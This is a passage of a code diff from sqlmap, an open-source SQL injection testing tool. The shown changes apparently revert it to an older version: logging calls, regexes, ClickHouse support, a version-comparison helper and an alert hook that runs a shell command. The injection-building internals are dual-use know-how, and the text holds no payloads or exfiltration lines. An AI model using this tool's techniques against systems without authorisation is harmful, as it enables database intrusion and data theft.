infoMsg = "skipping static %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
@@ -616,19 +598,6 @@ def start():
kb.injections.append(injection)
if not kb.alerted:
if conf.alert:
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
logger.info(infoMsg)
try:
process = subprocess.Popen(conf.alert, shell=True)
process.wait()
except Exception as ex:
errMsg = "error occurred while executing '%s' ('%s')" % (conf.alert, getSafeExString(ex))
logger.error(errMsg)
kb.alerted = True
# In case when user wants to end detection phase (Ctrl+C)
if not proceed:
break
@@ -643,7 +612,7 @@ def start():
if not injectable:
warnMsg = "%sparameter '%s' does not seem to be injectable" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.warning(warnMsg)
logger.warn(warnMsg)
finally:
if place == PLACE.COOKIE:
@@ -740,7 +709,7 @@ def start():
if conf.multipleTargets:
warnMsg = "user aborted in multiple target mode"
logger.warning(warnMsg)
logger.warn(warnMsg)
message = "do you want to skip to the next target in list? [Y/n/q]"
choice = readInput(message, default='Y').upper()
@@ -780,7 +749,7 @@ def start():
warnMsg = "it appears that the target "
warnMsg += "has a maximum connections "
warnMsg += "constraint"
logger.warning(warnMsg)
logger.warn(warnMsg)
if kb.dataOutputFlag and not conf.multipleTargets:
logger.info("fetched data logged to text files under '%s'" % conf.outputPath)

6
lib/controller/handler.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -14,7 +14,6 @@ from lib.core.exception import SqlmapConnectionException
from lib.core.settings import ACCESS_ALIASES
from lib.core.settings import ALTIBASE_ALIASES
from lib.core.settings import CACHE_ALIASES
from lib.core.settings import CLICKHOUSE_ALIASES
from lib.core.settings import CRATEDB_ALIASES
from lib.core.settings import CUBRID_ALIASES
from lib.core.settings import DB2_ALIASES
@@ -47,8 +46,6 @@ from plugins.dbms.altibase.connector import Connector as AltibaseConn
from plugins.dbms.altibase import AltibaseMap
from plugins.dbms.cache.connector import Connector as CacheConn
from plugins.dbms.cache import CacheMap
from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
from plugins.dbms.clickhouse import ClickHouseMap
from plugins.dbms.cratedb.connector import Connector as CrateDBConn
from plugins.dbms.cratedb import CrateDBMap
from plugins.dbms.cubrid.connector import Connector as CubridConn
@@ -125,7 +122,6 @@ def setHandler():
(DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
(DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
(DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
(DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
(DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
(DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
(DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),

2
lib/core/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

21
lib/core/agent.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -134,7 +134,7 @@ class Agent(object):
origValue = extractRegexResult(r"%s\s*:\s*(?P<result>\d+)\Z" % quote, origValue) or extractRegexResult(r"(?P<result>[^%s]*)\Z" % quote, origValue)
else:
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
origValue = _.split('=', 1)[1] if '=' in _ else _
origValue = _.split('=', 1)[1] if '=' in _ else ""
elif place == PLACE.CUSTOM_HEADER:
paramString = origValue
origValue = origValue[origValue.find(',') + 1:]
@@ -196,9 +196,9 @@ class Agent(object):
if place in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
_ = "%s%s" % (origValue, kb.customInjectionMark)
if kb.postHint == POST_HINT.JSON and isNumber(origValue) and not isNumber(newValue) and '"%s"' % _ not in paramString:
if kb.postHint == POST_HINT.JSON and not isNumber(newValue) and '"%s"' % _ not in paramString:
newValue = '"%s"' % self.addPayloadDelimiters(newValue)
elif kb.postHint == POST_HINT.JSON_LIKE and isNumber(origValue) and not isNumber(newValue) and re.search(r"['\"]%s['\"]" % re.escape(_), paramString) is None:
elif kb.postHint == POST_HINT.JSON_LIKE and not isNumber(newValue) and re.search(r"['\"]%s['\"]" % re.escape(_), paramString) is None:
newValue = "'%s'" % self.addPayloadDelimiters(newValue)
else:
newValue = self.addPayloadDelimiters(newValue)
@@ -489,7 +489,7 @@ class Agent(object):
if field and Backend.getIdentifiedDbms():
rootQuery = queries[Backend.getIdentifiedDbms()]
if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast and not (field.startswith("COUNT(") and getTechnique() in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION) and Backend.getIdentifiedDbms() == DBMS.MSSQL):
if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast:
nulledCastedField = field
else:
if not (Backend.isDbms(DBMS.SQLITE) and not isDBMSVersionAtLeast('3')):
@@ -581,7 +581,7 @@ class Agent(object):
"""
prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT(?: \d+)?)\s+\d+)*"
fieldsSelectTop = re.search(r"\ASELECT\s+TOP(\s+\d+|\s*\([^)]+\))\s+(.+?)\s+FROM", query, re.I)
fieldsSelectTop = re.search(r"\ASELECT\s+TOP(\s+[\d]|\s*\([^)]+\))\s+(.+?)\s+FROM", query, re.I)
fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I)
fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I)
fieldsSelectCase = re.search(r"\ASELECT%s\s+(\(CASE WHEN\s+.+\s+END\))" % prefixRegex, query, re.I)
@@ -596,9 +596,6 @@ class Agent(object):
if not _:
fieldsSelectFrom = None
if re.search(r"\bWHERE\b.+(MIN|MAX)", query, re.I):
fieldsMinMaxstr = None
fieldsToCastStr = fieldsNoSelect
if fieldsSubstr:
@@ -732,7 +729,7 @@ class Agent(object):
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1)
concatenatedQuery += "+'%s'" % kb.chars.stop
elif fieldsSelectTop:
topNum = re.search(r"\ASELECT\s+TOP(\s+\d+|\s*\([^)]+\))\s+", concatenatedQuery, re.I).group(1)
topNum = re.search(r"\ASELECT\s+TOP(\s+[\d]|\s*\([^)]+\))\s+", concatenatedQuery, re.I).group(1)
concatenatedQuery = concatenatedQuery.replace("SELECT TOP%s " % topNum, "TOP%s '%s'+" % (topNum, kb.chars.start), 1)
concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1)
elif fieldsSelectCase:
@@ -1027,8 +1024,8 @@ class Agent(object):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1)
limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB, DBMS.CLICKHOUSE):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() in (DBMS.FRONTBASE, DBMS.VIRTUOSO):

2
lib/core/bigarray.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

92
lib/core/common.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -351,7 +351,7 @@ class Backend(object):
elif kb.dbms is not None and kb.dbms != dbms:
warnMsg = "there appears to be a high probability that "
warnMsg += "this could be a false positive case"
logger.warning(warnMsg)
logger.warn(warnMsg)
msg = "sqlmap previously fingerprinted back-end DBMS as "
msg += "%s. However now it has been fingerprinted " % kb.dbms
@@ -371,7 +371,7 @@ class Backend(object):
break
else:
warnMsg = "invalid value"
logger.warning(warnMsg)
logger.warn(warnMsg)
elif kb.dbms is None:
kb.dbms = aliasToDbmsEnum(dbms)
@@ -429,7 +429,7 @@ class Backend(object):
break
else:
warnMsg = "invalid value"
logger.warning(warnMsg)
logger.warn(warnMsg)
elif kb.os is None and isinstance(os, six.string_types):
kb.os = os.capitalize()
@@ -466,7 +466,7 @@ class Backend(object):
break
else:
warnMsg = "invalid value. Valid values are 1 and 2"
logger.warning(warnMsg)
logger.warn(warnMsg)
return kb.arch
@@ -590,7 +590,7 @@ class Backend(object):
def isVersionGreaterOrEqualThan(version):
retVal = False
if all(_ not in (None, UNKNOWN_DBMS_VERSION) for _ in (Backend.getVersion(), version)):
if Backend.getVersion() is not None and version is not None:
_version = unArrayizeValue(Backend.getVersion())
_version = re.sub(r"[<>= ]", "", _version)
@@ -663,7 +663,7 @@ def paramToDict(place, parameters=None):
warnMsg += "chars/statements from manual SQL injection test(s). "
warnMsg += "Please, always use only valid parameter values "
warnMsg += "so sqlmap could be able to run properly"
logger.warning(warnMsg)
logger.warn(warnMsg)
message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] "
@@ -673,7 +673,7 @@ def paramToDict(place, parameters=None):
warnMsg = "provided value for parameter '%s' is empty. " % parameter
warnMsg += "Please, always use only valid parameter values "
warnMsg += "so sqlmap could be able to run properly"
logger.warning(warnMsg)
logger.warn(warnMsg)
if place in (PLACE.POST, PLACE.GET):
for regex in (r"\A((?:<[^>]+>)+\w+)((?:<[^>]+>)+)\Z", r"\A([^\w]+.*\w+)([^\w]+)\Z"):
@@ -738,7 +738,7 @@ def paramToDict(place, parameters=None):
if len(conf.testParameter) > 1:
warnMsg = "provided parameters '%s' " % paramStr
warnMsg += "are not inside the %s" % place
logger.warning(warnMsg)
logger.warn(warnMsg)
else:
parameter = conf.testParameter[0]
@@ -763,7 +763,7 @@ def paramToDict(place, parameters=None):
if len(decoded) > MIN_ENCODED_LEN_CHECK and all(_ in getBytes(string.printable) for _ in decoded):
warnMsg = "provided parameter '%s' " % parameter
warnMsg += "appears to be '%s' encoded" % encoding
logger.warning(warnMsg)
logger.warn(warnMsg)
break
except:
pass
@@ -814,7 +814,7 @@ def getManualDirectories():
else:
warnMsg = "unable to automatically retrieve the web server "
warnMsg += "document root"
logger.warning(warnMsg)
logger.warn(warnMsg)
directories = []
@@ -900,7 +900,7 @@ def getAutoDirectories():
retVal.add(directory)
else:
warnMsg = "unable to automatically parse any web server path"
logger.warning(warnMsg)
logger.warn(warnMsg)
return list(retVal)
@@ -1034,10 +1034,7 @@ def dataToStdout(data, forceOutput=False, bold=False, contentType=None, status=C
except UnicodeEncodeError:
sys.stdout.write(re.sub(r"[^ -~]", '?', clearColors(data)))
finally:
try:
sys.stdout.flush()
except IOError:
raise SystemExit
if multiThreadMode:
logging._releaseLock()
@@ -1640,7 +1637,7 @@ def parseTargetDirect():
if remote:
warnMsg = "direct connection over the network for "
warnMsg += "%s DBMS is not supported" % dbmsName
logger.warning(warnMsg)
logger.warn(warnMsg)
conf.hostname = "localhost"
conf.port = 0
@@ -1822,7 +1819,7 @@ def expandAsteriskForColumns(expression):
the SQL query string (expression)
"""
match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+(([`'\"][^`'\"]+[`'\"]|[\w.]+)+)(\s|\Z)", expression)
match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+((`[^`]+`|[^\s]+)+)", expression)
if match:
infoMsg = "you did not provide the fields in your query. "
@@ -1903,7 +1900,7 @@ def parseUnionPage(page):
if re.search(r"(?si)\A%s.*%s\Z" % (kb.chars.start, kb.chars.stop), page):
if len(page) > LARGE_OUTPUT_THRESHOLD:
warnMsg = "large output detected. This might take a while"
logger.warning(warnMsg)
logger.warn(warnMsg)
data = BigArray()
keys = set()
@@ -2792,7 +2789,7 @@ def wasLastResponseDelayed():
if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:
warnMsg = "time-based standard deviation method used on a model "
warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES
logger.warning(warnMsg)
logger.warn(warnMsg)
lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation
retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit))
@@ -3402,39 +3399,19 @@ def parseSqliteTableSchema(value):
>>> kb.data.cachedColumns = {}
>>> parseSqliteTableSchema("CREATE TABLE users(\\n\\t\\tid INTEGER,\\n\\t\\tname TEXT\\n);")
True
>>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('id', 'INTEGER'), ('name', 'TEXT'))
True
>>> parseSqliteTableSchema("CREATE TABLE dummy(`foo bar` BIGINT, \\"foo\\" VARCHAR, 'bar' TEXT)");
True
>>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('foo bar', 'BIGINT'), ('foo', 'VARCHAR'), ('bar', 'TEXT'))
True
>>> parseSqliteTableSchema("CREATE TABLE suppliers(\\n\\tsupplier_id INTEGER PRIMARY KEY DESC,\\n\\tname TEXT NOT NULL\\n);");
True
>>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('supplier_id', 'INTEGER'), ('name', 'TEXT'))
True
>>> parseSqliteTableSchema("CREATE TABLE country_languages (\\n\\tcountry_id INTEGER NOT NULL,\\n\\tlanguage_id INTEGER NOT NULL,\\n\\tPRIMARY KEY (country_id, language_id),\\n\\tFOREIGN KEY (country_id) REFERENCES countries (country_id) ON DELETE CASCADE ON UPDATE NO ACTION,\\tFOREIGN KEY (language_id) REFERENCES languages (language_id) ON DELETE CASCADE ON UPDATE NO ACTION);");
True
>>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('country_id', 'INTEGER'), ('language_id', 'INTEGER'))
>>> repr(kb.data.cachedColumns).count(',') == 1
True
"""
retVal = False
value = extractRegexResult(r"(?s)\((?P<result>.+)\)", value)
if value:
table = {}
columns = OrderedDict()
columns = {}
value = re.sub(r"\(.+?\)", "", value).strip()
for match in re.finditer(r"(?:\A|,)\s*(([\"'`]).+?\2|\w+)(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I):
column = match.group(1).strip(match.group(2) or "")
if re.search(r"(?i)\A(CONSTRAINT|PRIMARY|UNIQUE|CHECK|FOREIGN)\b", column.strip()):
continue
for match in re.finditer(r"[(,]\s*[\"'`]?(\w+)[\"'`]?(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I):
retVal = True
columns[column] = match.group(3) or "TEXT"
columns[match.group(1)] = match.group(2) or "TEXT"
table[safeSQLIdentificatorNaming(conf.tbl, True)] = columns
kb.data.cachedColumns[conf.db] = table
@@ -3616,7 +3593,7 @@ def initTechnique(technique=None):
else:
warnMsg = "there is no injection data available for technique "
warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique)
logger.warning(warnMsg)
logger.warn(warnMsg)
except SqlmapDataException:
errMsg = "missing data in old session file(s). "
@@ -3731,7 +3708,7 @@ def getSortedInjectionTests():
if test.stype == PAYLOAD.TECHNIQUE.UNION:
retVal = SORT_ORDER.LAST
elif "details" in test and "dbms" in (test.details or {}):
elif "details" in test and "dbms" in test.details:
if intersect(test.details.dbms, Backend.getIdentifiedDbms()):
retVal = SORT_ORDER.SECOND
else:
@@ -3767,7 +3744,7 @@ def showHttpErrorCodes():
if kb.httpErrorCodes:
warnMsg = "HTTP error codes detected during run:\n"
warnMsg += ", ".join("%d (%s) - %d times" % (code, _http_client.responses[code] if code in _http_client.responses else '?', count) for code, count in kb.httpErrorCodes.items())
logger.warning(warnMsg)
logger.warn(warnMsg)
if any((str(_).startswith('4') or str(_).startswith('5')) and _ != _http_client.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes):
msg = "too many 4xx and/or 5xx HTTP error codes "
msg += "could mean that some kind of protection is involved (e.g. WAF)"
@@ -3995,7 +3972,7 @@ def createGithubIssue(errMsg, excMsg):
if closed:
warnMsg += " and resolved. Please update to the latest "
warnMsg += "development version from official GitHub repository at '%s'" % GIT_PAGE
logger.warning(warnMsg)
logger.warn(warnMsg)
return
except:
pass
@@ -4025,7 +4002,7 @@ def createGithubIssue(errMsg, excMsg):
warnMsg += " ('%s')" % _excMsg
if "Unauthorized" in warnMsg:
warnMsg += ". Please update to the latest revision"
logger.warning(warnMsg)
logger.warn(warnMsg)
def maskSensitiveData(msg):
"""
@@ -4033,7 +4010,7 @@ def maskSensitiveData(msg):
>>> maskSensitiveData('python sqlmap.py -u "http://www.test.com/vuln.php?id=1" --banner') == 'python sqlmap.py -u *********************************** --banner'
True
>>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index --auth-type=basic --auth-creds=foo:bar\\ndummy line') == 'sqlmap.py -u ************************** --auth-type=***** --auth-creds=*******\\ndummy line'
>>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index') == 'sqlmap.py -u **************************'
True
"""
@@ -4049,7 +4026,7 @@ def maskSensitiveData(msg):
retVal = retVal.replace(value, '*' * len(value))
# Just in case (for problematic parameters regarding user encoding)
for match in re.finditer(r"(?im)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|$)", retVal):
for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|\Z)", retVal):
retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))
# Fail-safe substitutions
@@ -4292,7 +4269,6 @@ def safeSQLIdentificatorNaming(name, isTable=False):
retVal = "[%s]" % retVal
if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal):
if (conf.db or "").lower() != "information_schema": # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5192
retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal)
return retVal
@@ -4419,7 +4395,7 @@ def expandMnemonics(mnemonics, parser, args):
if not options:
warnMsg = "mnemonic '%s' can't be resolved" % name
logger.warning(warnMsg)
logger.warn(warnMsg)
elif name in options:
found = name
debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
@@ -4428,7 +4404,7 @@ def expandMnemonics(mnemonics, parser, args):
found = sorted(options.keys(), key=len)[0]
warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options))
warnMsg += "Resolved to shortest of those ('%s')" % found
logger.warning(warnMsg)
logger.warn(warnMsg)
if found:
found = options[found]
@@ -4717,7 +4693,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
else:
url = urldecode(request.get_full_url(), kb.pageEncoding)
method = request.get_method()
data = unArrayizeValue(request.data)
data = request.data
data = urldecode(data, kb.pageEncoding, spaceplus=False)
if not data and method and method.upper() == HTTPMETHOD.POST:
@@ -4834,7 +4810,7 @@ def checkOldOptions(args):
warnMsg = "switch/option '%s' is deprecated" % _
if DEPRECATED_OPTIONS[_]:
warnMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_]
logger.warning(warnMsg)
logger.warn(warnMsg)
def checkSystemEncoding():
"""
@@ -4852,7 +4828,7 @@ def checkSystemEncoding():
logger.critical(errMsg)
warnMsg = "temporary switching to charset 'cp1256'"
logger.warning(warnMsg)
logger.warn(warnMsg)
_reload_module(sys)
sys.setdefaultencoding("cp1256")
@@ -5327,7 +5303,6 @@ def parseRequestFile(reqFile, checkParams=True):
continue
getPostReq = False
forceBody = False
url = None
host = None
method = None
@@ -5348,7 +5323,7 @@ def parseRequestFile(reqFile, checkParams=True):
line = line.strip('\r')
match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None
if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None:
if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
data = ""
params = True
@@ -5395,7 +5370,6 @@ def parseRequestFile(reqFile, checkParams=True):
# headers and consider the following lines as
# POSTed data
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
forceBody = True
params = True
# Avoid proxy and connection type related headers

41
lib/core/compat.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -12,7 +12,6 @@ import functools
import math
import os
import random
import re
import sys
import time
import uuid
@@ -278,37 +277,7 @@ else:
xrange = xrange
buffer = buffer
def LooseVersion(version):
"""
>>> LooseVersion("1.0") == LooseVersion("1.0")
True
>>> LooseVersion("1.0.1") > LooseVersion("1.0")
True
>>> LooseVersion("1.0.1-") == LooseVersion("1.0.1")
True
>>> LooseVersion("1.0.11") < LooseVersion("1.0.111")
True
>>> LooseVersion("foobar") > LooseVersion("1.0")
False
>>> LooseVersion("1.0") > LooseVersion("foobar")
False
>>> LooseVersion("3.22-mysql") == LooseVersion("3.22-mysql-ubuntu0.3")
True
>>> LooseVersion("8.0.22-0ubuntu0.20.04.2")
8.000022
"""
match = re.search(r"\A(\d[\d.]*)", version or "")
if match:
result = 0
value = match.group(1)
weight = 1.0
for part in value.strip('.').split('.'):
if part.isdigit():
result += int(part) * weight
weight *= 1e-3
else:
result = float("NaN")
return result
try:
from pkg_resources import parse_version as LooseVersion
except ImportError:
from distutils.version import LooseVersion

2
lib/core/convert.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
lib/core/data.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
lib/core/datatype.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

Some files were not shown because too many files have changed in this diff Show More